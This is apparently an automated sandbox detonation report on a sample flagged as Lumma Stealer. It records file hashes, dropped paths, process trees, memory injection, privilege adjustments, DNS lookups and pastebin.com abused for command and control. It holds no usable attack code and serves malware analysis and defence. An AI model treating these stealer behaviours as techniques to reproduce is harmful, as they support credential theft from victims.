memory/3320-647-0x00007FFE4D6D0000-0x00007FFE4D842000-memory.dmp

memory/3320-650-0x00007FFE53800000-0x00007FFE53834000-memory.dmp

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

MD5 290c26b1579fd3e48d60181a2d22a287
SHA1 e4c91a7f161783c68cf67250206047f23bd25a29
SHA256 973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128
SHA512 114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 5d8fe5632c9254faaffa00f842a4c4cc
SHA1 461cd923dddf0e5ea639d6af48cef43b56878730
SHA256 80bb553c1ecf11cbd4dcc5ee7f73361d3862e04f3f462a8f073cde420f48d9ae
SHA512 430183c4667044a8f42b600e6f582489244452760785e44683855c7e6c86d26cbdb780d94ee36f8bf6200a0ccaf46d55eddc2b2f9031c89220630534d88f0633

Analysis: behavioral16

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

153s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 1900 wrote to memory of 4092 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

121s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2248 wrote to memory of 4580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2248 wrote to memory of 4580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2248 wrote to memory of 4580 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\awt.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=4316 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240708-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\bci.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 220

Network

N/A

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2128 wrote to memory of 1308 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:14

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2516 wrote to memory of 3008 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

121s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 220

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

129s

Max time network

159s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

Signatures

N/A

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=2152,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4688,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=4700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5400,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=5548,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5560 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --field-trial-handle=5584,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5640 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --field-trial-handle=6040,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=6048 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=5744,i,12198811467968044966,17227406646827438786,262144 --variations-seed-version --mojo-platform-channel-handle=5912 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 92.123.241.137:443 www.microsoft.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 2.19.117.71:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 137.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 71.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 92.123.128.149:443 www.bing.com udp
US 8.8.8.8:53 149.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
GB 92.123.128.149:443 www.bing.com tcp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

8s

Max time network

20s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2236 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\337944881edc1d04f3adae65201e2427\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1176 set thread context of 2420 N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\wbem\WMIC.exe N/A
